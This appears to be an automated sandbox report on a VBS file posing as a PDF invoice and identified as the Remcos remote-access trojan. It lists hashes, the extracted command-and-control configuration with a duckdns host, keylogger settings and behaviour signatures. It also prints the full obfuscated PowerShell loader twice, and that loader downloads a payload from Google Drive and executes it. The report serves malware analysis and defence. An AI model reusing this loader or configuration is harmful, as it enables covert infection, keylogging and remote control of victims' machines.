Overview

overview

10

Static

static

1

A1_racun_0...df.vbs

windows7-x64

10

A1_racun_0...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 19:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    A1_racun_09-2024·pdf.vbs

  • Size

    72KB

  • MD5

    75c46eded8d56cffa52b4bf86615c200

  • SHA1

    8519d8a27d4663d6c3c70991c0cc757d16790b4e

  • SHA256

    8e1d67ca2d0e0003ed384472bc64f1c659ea0433539b821203c7e4d42b5efe18

  • SHA512

    3732e3bb921c00dd67d9f630b6638ec05aa097a4e7b4ffdb7344014ee9ba74d8924db42f1d6789577529573bbfca03394cde3e81d4253dd013dcbb2833a07d8d

  • SSDEEP

    1536:sBg98qp1hVcA8ACb+p3HzYxZ+cBvSnAnO70P5XIf:si9fvAAO+lcBanCOZf

Score
10/10
remcosremotehostdiscoveryexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WDQFG0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A1_racun_09-2024·pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bedstemorens Tweets sautes Reweaving Bldt #>;$Sigten='Precelebrant';<#Opisthographal Uncurious Sumdum Oratorially Nonreligiously Bronkitisserne #>;$Erogen=$host.PrivateData;If ($Erogen) {$Blgedalenes++;}function Udligningsbelbene($Fatuity52){$Skiff42=$Bethank+$Fatuity52.Length-$Blgedalenes;for( $Wienerinder=5;$Wienerinder -lt $Skiff42;$Wienerinder+=6){$gedeskindenes='Slder';$Forsamledes+=$Fatuity52[$Wienerinder];}$Forsamledes;}function Dunne($Pulik){ . ($Knaphulsstings) ($Pulik);}$Salinities=Udligningsbelbene 'FrizzMDisowo DiaczUninviCunenlMi aslCarboaMokke/Param5Germa. Aus,0Mblet Schi,(WaterWBr dbiEng gntilhudHjspnoSuscewTemposUd.ke ClumpNRe deTIntel Brome1Balst0Subre.A oni0Tidsb; ,les NonarWStjeriLecitn Bodr6 Trl 4Flyvr;Doate F senx i co6.mphi4 Soli;.otal AbomarMankivKnst :kl ss1Forul2Pl ds1Sintr.Toers0 pka)N cki Eru tG LommeOpiumcTanglkDebtsoViros/Beska2Geolo0U.dra1Omvi 0Abbre0 ampr1Konto0Hemat1Lan,l RapmbF aneniLukrzrGuanoeSkottf,orveo P.scx Para/Excit1trykn2Brneh1 duis.Plove0 Petr ';$zymotize=Udligningsbelbene 'dic cUErkynsRaideETimbeRBukse- Pis,aUdtaggMiddlEmi liNOribatSubsu ';$Distriktsblade121=Udligningsbelbene 'Foggih En stAccort bahupSemimsExami:Micro/Totur/EjenddNonprr nwomiF derv sbjeeTehue.HandlgSummeo BistoStarcg MrkelLiggeeEpipl. LaurcSemiboNeshnmCoedu/ GroguBiophc data? Udk,eDerivxCastap KrumoSamfur PasttCon,r=Maskid enfaoMe etwExa tnRetr l Rej o Couna ugtidPlanl&HotdoiDimind .ecu=Ropis1GrundWForelnSamd KAttri9B.oloxSlutnw N,wtoProseHVater6KatedBOperoPTogbeVGlauco etallSpidsxHe.erVplagerTen oRTilraKReligVUnterF Hov OBoldk4,arkexTendeI VeroXInstrJImperaWendioShankpAf ra7LengtrVarmh ';$Aquatones=Udligningsbelbene 'Volie>Peziz ';$Knaphulsstings=Udligningsbelbene 'K.llaIFrankEU.chaX.atte ';$Brislers='Raastofmangelens';$Plowed='\Tungebaand.Oly';Dunne (Udligningsbelbene ' N.tr$ PrevgSecu l Cygnostak bSkud abag il Nonv:Fort aUnheusKonfofAkslea DomfltapewtBankkeCano rRegule dri tMeni = xcla$Cloc eAfpron For,v Fris: Pl.raSkridpArt cpKvrked lasuaSneaptSisteaAnted+Pregr$sterePUnacclMisa oOp rkw redieGoo ydafd a ');Dunne (Udligningsbelbene ' tema$DownhgSambhlSigj.oByerhbSignaa,ekselPer o:ZircoOCou aoGive nAddretBibli=Slkni$ S bnDYd rli Kar.s rastMcknirWeakfiMetank Ra et,lodpsfjogtb malalTib raRedssd ideneScen,1,melt2 bibe1Peb.l.f lmosAftrap Cobaltomgaian setPaneg(Ar.ej$SurliASundeq GodsuT,nkbaHonortMadlaoSrbotnLathdeVildesFl.pp)Ba el ');Dunne (Udligningsbelbene '.reye[SludaN Ba eeConsttTerrn.ValutSBurnie .ichrCratcvI,tegiBarylc Ex oeignazP Betho CybeiOmordnOutletIndtgMn viga StvsnH lomaRaastgDeclae MacrrEn ea]kines:Vedtg:A magSNi,roe LtnicMinisuRy eprFals,i YenstSerowyRackaPFatter Prinotr lltRameqoMycetcNonimoNons lFi tl Bd i=Tegng Avit.[ HydrN Ov reKapact Impo. RubeSCe,eveFundhcSubpruBoodlrmerskiPylort antyBylanPReal,rB uehoFlas tBismaoR ligcBiddeo FastlH lefT,tofmySagtmp PaineOv,ra] ogeb:Catal:Hjer TRealilKortssKokke1Landb2Endot ');$Distriktsblade121=$Oont[0];$Obtund=(Udligningsbelbene 'R pag$UneclGNaturlHeptyo,roodbCr ssAComprL redi:HeiniELighelFeminIintermRuddliStemmnOrrhoENonp.RNonseiCountNMakroGDioceEPearlRDolesN AirsETypalSIndla=WhirlnPartoESr.gnw Hell-Imp cOSlagsbpremiJ rintETndehCcomprTNedfo klftnsAltstyWeepis mel,TApokaeDrikfm Mo,n. Ko oNRntgeESlg ntAvert. iplawM ldieIngveBBadmic NytaLKust,IlrdomEShithNFrek.TK gep ');Dunne ($Obtund);Dunne (Udligningsbelbene 'Aff t$PolicE.hinil fhei KrnemS ilii Zionnl,gere.ndrir ggriblu.bnRewhigEn.gme ndtgr FlamnVagtpePolytsEndos.Vi trHAerose Unreaafterdpr,foePr,prrD.scis Afho[Lns i$Bec ezTempeyOpacim lippoVensktTelefiStemmzOms ee.udsf]tandr= Land$MozinSLgemiaSmu llAntediEnantn SpdbiMetabtP esciP inteGru tsBerga ');$Studfishes=Udligningsbelbene 'Halmv$CentrEEst dlBetini IsohmTotaliTi kpnSibyle nthrrBroafiSt esnAfblogD nateMdeplr.husenTabe.e laybsDisma. ErhvDZamb o HouswHaemonIn erl ornioKerataRefordMemenFLa.dli tol lImposeBohrm( Aads$FigurDFrokoiUn,las Ark,t IgbirFejldiUniplk Paast Thias rtifbRefo l MultaS oerd PrineTa pi1Fuld.2Okker1Livsv,Axega$ Syb.MReve iAnekdc SargrUpta oFo eph DoboiEfte,sMen etAblaso.roprlMonegoArro gt ilwyHandi)Knipl ';$Microhistology=$asfalteret;Dunne (Udligningsbelbene 'Still$T tmagBlokilChickoBetydBMoreiaKommaLmikro: IndkBmo,ilrNutilk RaagSA kapt,orseRDi maeSpaltg Arbee SpinNMilja= Deci( GelnTForf EMur.esSki.pTRab,l-S rotPSetouA awaitW tchHtost krigs$ AntiMMimreIE,ihiCPladsRChromo AbonhKohreiStjplSslrepTS ammOCirculSvumnoAnimagGeonoyHuman)Bas i ');while (!$Brkstregen) {Dunne (Udligningsbelbene 'Inter$Restag,ropylIndivoNststbbog,yaSmittlCereb:StatiLImp daUd ykm Sk tpTempoe Fl t=Finan$kastrt Teknr FaluuFolkee iger ') ;Dunne $Studfishes;Dunne (Udligningsbelbene 'Bev tSPh.set AlefaH.rnerGauditSuper-O ersSHyperlSh,pbeElsdyeDrivfpChair S bem4 onex ');Dunne (Udligningsbelbene ' Gyms$Hede.gRsterlJobsko.xittb mallaPrinclYde l: FrdiB TromrStbolkinflas Ophit HavorSdceletegnsgHydr eEkskonPjatt=P,sit(GalsiTUnf ce FishsBajontFlise-KipchPEftera GenatPhotoh Bun Afve,$Leis,MBeveliSheddcAmphirTomfoo nacah Hypoi Tunes Const Inn,o ismol ithio frangtsendy ellb)Brewt ') ;Dunne (Udligningsbelbene 'Forli$SkralgBlomslReiv.o genb tilkaHe.tellongo:PileoRNympheContrt SpiriDadeln,regotS,mareSk.lddTrold=Sci.p$ iewg Jernl ebroRegnfbBogtiaIdentlKapac:Span F KnucaAnkyluBesttnKlynkaLejevt Kbete,cerndOvers1Nonac9Bes.e7Bylde+Quart+ Trea%Disbu$adjunOTurntoE,ochn Dh.bttrans.OplyscUnem oembr,u Folkn aletJenop ') ;$Distriktsblade121=$Oont[$Retinted];}$Faglrereksaminerne=306046;$Jumpers=31093;Dunne (Udligningsbelbene 'Snebl$ScrewgHeptalinhe oBagerb LeodaUpknilRebet:SidelVwi doitredjdKelloe,agttonaesttBjarke gentxSclert nder Telev=Bifil u docGhklineForurtT.gns-gorheCArmhuo,ensinProbltRomanep eben ConvtDrags Mir.$DecedM Shrii RisqcinfirrglycioAfterhBelgniSlar s,nbehtT,edbo Jal lKata,o UndegNdig yTunin ');Dunne (Udligningsbelbene 'Blads$UnglugJailhlPrivao Ico bReproas,mmelOpina: Woo R Chroeknarrn EdelgMasturKittliElatonDesorgSlj,ssBrnesmAmbitiRep,td ,tuddJacuaeCa.sulBols f irkua Her bSakarrRetu i B.kekUrofuaE,holn Bri tP,oceeesphrr Div nS gene To,dsa,kyl Olie =Prfe Hypod[OmbudSKon.ly Elo sGrammtSondeeFejlsmSubge.BademCAnnonoRakisnS ppev Eri eStuntr Eurotbu ge]Ep sy:Huma :Dimi.FstrumrbesvaoB igemPhyllBJernvaChocos.idude Sulk6Pre.e4 goleSKontotFreelrArauci P asnLea agBesig(Jazze$EinegVMazo i sl pdNewtoeSpyt o rikttBarefeFoldnx Ust,t Scan)Kanva ');Dunne (Udligningsbelbene 'Dis r$Kaldeg hiffl StriostivnbAutova.yanslPurit: UjvnsVandbpNytaaeAbrikn F gkcReubee Unorra,idlk.utnaj CepeoSala l,itche EthnrC.mon Seneg= Cy,o Holos[H.steSSynchy Tilts.rosstEnd.ceWoo bmS rut.Tn stT ParaeDisenxDep,otS nco. HjttEConfinS owfcUntiroUninudStithiFuld n ForvgAntnd]Cirr :Tampn:TabueA LaveS TwinCKu stIIndefIUvs,n.BreakGAlleye G netWiattSOvervtMargir MisliTaxomn,kandgSagfr( Toil$Ib,riROxideeTypebnAttingLarinrSawtoiDuedonflatbg EpissRegiomP stei KopidHea adsjle.eGuld,l Bo bfHaandaKontobKomfor nalyiAnmelk HusuaKnsttn Ihrdt,ukeye rierAntifnmelleeInd.os ongh) Test ');Dunne (Udligningsbelbene ' Octo$Pyridg,actel,birroT thob Ord a Panpl Ess,:M rciNtetryoRel anDyre eGoplexSchedpMonola PengnTrlgnsFrosciEloinvAdusteSup rnSprineConars ootsSvejf= Par $Loques An lpdw rfeSalamnPterocSextueDorharSkurkkBrogajUnc,ro lammlRecroe unstr Auxi.NonprsHex.guPas abCh issPro ctHesper LogwiAktivnSti pgAf en( nsha$sulciF Dec.aFjantgBehanlPseudrKnalde A.tsrStoryeMaattk,oldks,nhecaR spem,aleoiMars nR.hineDyslerB olon Siouenonp , Warr$ MothJDam,suTyt emTotalpB smaeProcorSvindsTrane)Ussrm ');Dunne $Nonexpansiveness;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2052
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bedstemorens Tweets sautes Reweaving Bldt #>;$Sigten='Precelebrant';<#Opisthographal Uncurious Sumdum Oratorially Nonreligiously Bronkitisserne #>;$Erogen=$host.PrivateData;If ($Erogen) {$Blgedalenes++;}function Udligningsbelbene($Fatuity52){$Skiff42=$Bethank+$Fatuity52.Length-$Blgedalenes;for( $Wienerinder=5;$Wienerinder -lt $Skiff42;$Wienerinder+=6){$gedeskindenes='Slder';$Forsamledes+=$Fatuity52[$Wienerinder];}$Forsamledes;}function Dunne($Pulik){ . ($Knaphulsstings) ($Pulik);}$Salinities=Udligningsbelbene 'FrizzMDisowo DiaczUninviCunenlMi aslCarboaMokke/Param5Germa. Aus,0Mblet Schi,(WaterWBr dbiEng gntilhudHjspnoSuscewTemposUd.ke ClumpNRe deTIntel Brome1Balst0Subre.A oni0Tidsb; ,les NonarWStjeriLecitn Bodr6 Trl 4Flyvr;Doate F senx i co6.mphi4 Soli;.otal AbomarMankivKnst :kl ss1Forul2Pl ds1Sintr.Toers0 pka)N cki Eru tG LommeOpiumcTanglkDebtsoViros/Beska2Geolo0U.dra1Omvi 0Abbre0 ampr1Konto0Hemat1Lan,l RapmbF aneniLukrzrGuanoeSkottf,orveo P.scx Para/Excit1trykn2Brneh1 duis.Plove0 Petr ';$zymotize=Udligningsbelbene 'dic cUErkynsRaideETimbeRBukse- Pis,aUdtaggMiddlEmi liNOribatSubsu ';$Distriktsblade121=Udligningsbelbene 'Foggih En stAccort bahupSemimsExami:Micro/Totur/EjenddNonprr nwomiF derv sbjeeTehue.HandlgSummeo BistoStarcg MrkelLiggeeEpipl. LaurcSemiboNeshnmCoedu/ GroguBiophc data? Udk,eDerivxCastap KrumoSamfur PasttCon,r=Maskid enfaoMe etwExa tnRetr l Rej o Couna ugtidPlanl&HotdoiDimind .ecu=Ropis1GrundWForelnSamd KAttri9B.oloxSlutnw N,wtoProseHVater6KatedBOperoPTogbeVGlauco etallSpidsxHe.erVplagerTen oRTilraKReligVUnterF Hov OBoldk4,arkexTendeI VeroXInstrJImperaWendioShankpAf ra7LengtrVarmh ';$Aquatones=Udligningsbelbene 'Volie>Peziz ';$Knaphulsstings=Udligningsbelbene 'K.llaIFrankEU.chaX.atte ';$Brislers='Raastofmangelens';$Plowed='\Tungebaand.Oly';Dunne (Udligningsbelbene ' N.tr$ PrevgSecu l Cygnostak bSkud abag il Nonv:Fort aUnheusKonfofAkslea DomfltapewtBankkeCano rRegule dri tMeni = xcla$Cloc eAfpron For,v Fris: Pl.raSkridpArt cpKvrked lasuaSneaptSisteaAnted+Pregr$sterePUnacclMisa oOp rkw redieGoo ydafd a ');Dunne (Udligningsbelbene ' tema$DownhgSambhlSigj.oByerhbSignaa,ekselPer o:ZircoOCou aoGive nAddretBibli=Slkni$ S bnDYd rli Kar.s rastMcknirWeakfiMetank Ra et,lodpsfjogtb malalTib raRedssd ideneScen,1,melt2 bibe1Peb.l.f lmosAftrap Cobaltomgaian setPaneg(Ar.ej$SurliASundeq GodsuT,nkbaHonortMadlaoSrbotnLathdeVildesFl.pp)Ba el ');Dunne (Udligningsbelbene '.reye[SludaN Ba eeConsttTerrn.ValutSBurnie .ichrCratcvI,tegiBarylc Ex oeignazP Betho CybeiOmordnOutletIndtgMn viga StvsnH lomaRaastgDeclae MacrrEn ea]kines:Vedtg:A magSNi,roe LtnicMinisuRy eprFals,i YenstSerowyRackaPFatter Prinotr lltRameqoMycetcNonimoNons lFi tl Bd i=Tegng Avit.[ HydrN Ov reKapact Impo. RubeSCe,eveFundhcSubpruBoodlrmerskiPylort antyBylanPReal,rB uehoFlas tBismaoR ligcBiddeo FastlH lefT,tofmySagtmp PaineOv,ra] ogeb:Catal:Hjer TRealilKortssKokke1Landb2Endot ');$Distriktsblade121=$Oont[0];$Obtund=(Udligningsbelbene 'R pag$UneclGNaturlHeptyo,roodbCr ssAComprL redi:HeiniELighelFeminIintermRuddliStemmnOrrhoENonp.RNonseiCountNMakroGDioceEPearlRDolesN AirsETypalSIndla=WhirlnPartoESr.gnw Hell-Imp cOSlagsbpremiJ rintETndehCcomprTNedfo klftnsAltstyWeepis mel,TApokaeDrikfm Mo,n. Ko oNRntgeESlg ntAvert. iplawM ldieIngveBBadmic NytaLKust,IlrdomEShithNFrek.TK gep ');Dunne ($Obtund);Dunne (Udligningsbelbene 'Aff t$PolicE.hinil fhei KrnemS ilii Zionnl,gere.ndrir ggriblu.bnRewhigEn.gme ndtgr FlamnVagtpePolytsEndos.Vi trHAerose Unreaafterdpr,foePr,prrD.scis Afho[Lns i$Bec ezTempeyOpacim lippoVensktTelefiStemmzOms ee.udsf]tandr= Land$MozinSLgemiaSmu llAntediEnantn SpdbiMetabtP esciP inteGru tsBerga ');$Studfishes=Udligningsbelbene 'Halmv$CentrEEst dlBetini IsohmTotaliTi kpnSibyle nthrrBroafiSt esnAfblogD nateMdeplr.husenTabe.e laybsDisma. ErhvDZamb o HouswHaemonIn erl ornioKerataRefordMemenFLa.dli tol lImposeBohrm( Aads$FigurDFrokoiUn,las Ark,t IgbirFejldiUniplk Paast Thias rtifbRefo l MultaS oerd PrineTa pi1Fuld.2Okker1Livsv,Axega$ Syb.MReve iAnekdc SargrUpta oFo eph DoboiEfte,sMen etAblaso.roprlMonegoArro gt ilwyHandi)Knipl ';$Microhistology=$asfalteret;Dunne (Udligningsbelbene 'Still$T tmagBlokilChickoBetydBMoreiaKommaLmikro: IndkBmo,ilrNutilk RaagSA kapt,orseRDi maeSpaltg Arbee SpinNMilja= Deci( GelnTForf EMur.esSki.pTRab,l-S rotPSetouA awaitW tchHtost krigs$ AntiMMimreIE,ihiCPladsRChromo AbonhKohreiStjplSslrepTS ammOCirculSvumnoAnimagGeonoyHuman)Bas i ');while (!$Brkstregen) {Dunne (Udligningsbelbene 'Inter$Restag,ropylIndivoNststbbog,yaSmittlCereb:StatiLImp daUd ykm Sk tpTempoe Fl t=Finan$kastrt Teknr FaluuFolkee iger ') ;Dunne $Studfishes;Dunne (Udligningsbelbene 'Bev tSPh.set AlefaH.rnerGauditSuper-O ersSHyperlSh,pbeElsdyeDrivfpChair S bem4 onex ');Dunne (Udligningsbelbene ' Gyms$Hede.gRsterlJobsko.xittb mallaPrinclYde l: FrdiB TromrStbolkinflas Ophit HavorSdceletegnsgHydr eEkskonPjatt=P,sit(GalsiTUnf ce FishsBajontFlise-KipchPEftera GenatPhotoh Bun Afve,$Leis,MBeveliSheddcAmphirTomfoo nacah Hypoi Tunes Const Inn,o ismol ithio frangtsendy ellb)Brewt ') ;Dunne (Udligningsbelbene 'Forli$SkralgBlomslReiv.o genb tilkaHe.tellongo:PileoRNympheContrt SpiriDadeln,regotS,mareSk.lddTrold=Sci.p$ iewg Jernl ebroRegnfbBogtiaIdentlKapac:Span F KnucaAnkyluBesttnKlynkaLejevt Kbete,cerndOvers1Nonac9Bes.e7Bylde+Quart+ Trea%Disbu$adjunOTurntoE,ochn Dh.bttrans.OplyscUnem oembr,u Folkn aletJenop ') ;$Distriktsblade121=$Oont[$Retinted];}$Faglrereksaminerne=306046;$Jumpers=31093;Dunne (Udligningsbelbene 'Snebl$ScrewgHeptalinhe oBagerb LeodaUpknilRebet:SidelVwi doitredjdKelloe,agttonaesttBjarke gentxSclert nder Telev=Bifil u docGhklineForurtT.gns-gorheCArmhuo,ensinProbltRomanep eben ConvtDrags Mir.$DecedM Shrii RisqcinfirrglycioAfterhBelgniSlar s,nbehtT,edbo Jal lKata,o UndegNdig yTunin ');Dunne (Udligningsbelbene 'Blads$UnglugJailhlPrivao Ico bReproas,mmelOpina: Woo R Chroeknarrn EdelgMasturKittliElatonDesorgSlj,ssBrnesmAmbitiRep,td ,tuddJacuaeCa.sulBols f irkua Her bSakarrRetu i B.kekUrofuaE,holn Bri tP,oceeesphrr Div nS gene To,dsa,kyl Olie =Prfe Hypod[OmbudSKon.ly Elo sGrammtSondeeFejlsmSubge.BademCAnnonoRakisnS ppev Eri eStuntr Eurotbu ge]Ep sy:Huma :Dimi.FstrumrbesvaoB igemPhyllBJernvaChocos.idude Sulk6Pre.e4 goleSKontotFreelrArauci P asnLea agBesig(Jazze$EinegVMazo i sl pdNewtoeSpyt o rikttBarefeFoldnx Ust,t Scan)Kanva ');Dunne (Udligningsbelbene 'Dis r$Kaldeg hiffl StriostivnbAutova.yanslPurit: UjvnsVandbpNytaaeAbrikn F gkcReubee Unorra,idlk.utnaj CepeoSala l,itche EthnrC.mon Seneg= Cy,o Holos[H.steSSynchy Tilts.rosstEnd.ceWoo bmS rut.Tn stT ParaeDisenxDep,otS nco. HjttEConfinS owfcUntiroUninudStithiFuld n ForvgAntnd]Cirr :Tampn:TabueA LaveS TwinCKu stIIndefIUvs,n.BreakGAlleye G netWiattSOvervtMargir MisliTaxomn,kandgSagfr( Toil$Ib,riROxideeTypebnAttingLarinrSawtoiDuedonflatbg EpissRegiomP stei KopidHea adsjle.eGuld,l Bo bfHaandaKontobKomfor nalyiAnmelk HusuaKnsttn Ihrdt,ukeye rierAntifnmelleeInd.os ongh) Test ');Dunne (Udligningsbelbene ' Octo$Pyridg,actel,birroT thob Ord a Panpl Ess,:M rciNtetryoRel anDyre eGoplexSchedpMonola PengnTrlgnsFrosciEloinvAdusteSup rnSprineConars ootsSvejf= Par $Loques An lpdw rfeSalamnPterocSextueDorharSkurkkBrogajUnc,ro lammlRecroe unstr Auxi.NonprsHex.guPas abCh issPro ctHesper LogwiAktivnSti pgAf en( nsha$sulciF Dec.aFjantgBehanlPseudrKnalde A.tsrStoryeMaattk,oldks,nhecaR spem,aleoiMars nR.hineDyslerB olon Siouenonp , Warr$ MothJDam,suTyt emTotalpB smaeProcorSvindsTrane)Ussrm ');Dunne $Nonexpansiveness;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:2904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    3dc2468b1b3f1756a0140481638beb32

    SHA1

    f1bb86512fe03b0a580e432582185dd385c58f0d

    SHA256

    5c75db86e0d06482fbe442705db9330de91a3436d9957c0acc6c3efd7695c757

    SHA512

    9e5d967235745d01d31a40ec9460a97d9cdf234d404a7c917e02b1ffb6e1c4aa41425e18833136a1c2e1d00d20d87eee0c6b5eb295d595b295f25537d3d53ebc

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HZ2V2IQCFN956V20H2EA.temp
    Filesize

    7KB

    MD5

    5ddc10827b193406b222eb689d0ab56f

    SHA1

    6ba408569aa3add794ca8be240adebf66d60cdfc

    SHA256

    26e8ebcfb15551bc7fc3cd5a5e84cd5105e24f22ff1e790acd6de7f7e7a8e6a9

    SHA512

    0ccb8d94ce0bf0d99d1580fd0d896934a759f59675611aff9cc2d0c0c84c19502cc578bf9aa031f0d7ce246b26ea54275a187c1428c047cf115da3d4add3e0f2

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Tungebaand.Oly
    Filesize

    438KB

    MD5

    0743eaf070a6ca9050b3c77dc3ce4e17

    SHA1

    10bca95e76500e62c55e184ecbfbd9c41b21e4ec

    SHA256

    79481ee789ec7e7da046d266e6b3628e666aff76bc57213ffcadfbd5900f7503

    SHA512

    2024f6b23068a9b4e5dffdab6a4acd490da8ede8990fe18d13e0bbfff47918e475489bb5f1c18f54fb5a1d8e998e1625477facbe7cf45e5c28dcd4c4885ce321

    Download Submit

  • memory/2052-8-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-15-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-10-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-9-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-11-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-13-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2052-14-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-4-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2052-17-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-5-0x000000001B4A0000-0x000000001B782000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2052-6-0x00000000029A0000-0x00000000029A8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2052-7-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2792-21-0x00000000066C0000-0x000000000AF76000-memory.dmp

    Filesize

    72.7MB

    Download

  • memory/2904-41-0x00000000002A0000-0x0000000001302000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2904-43-0x00000000002A0000-0x0000000001302000-memory.dmp

    Filesize

    16.4MB

    Download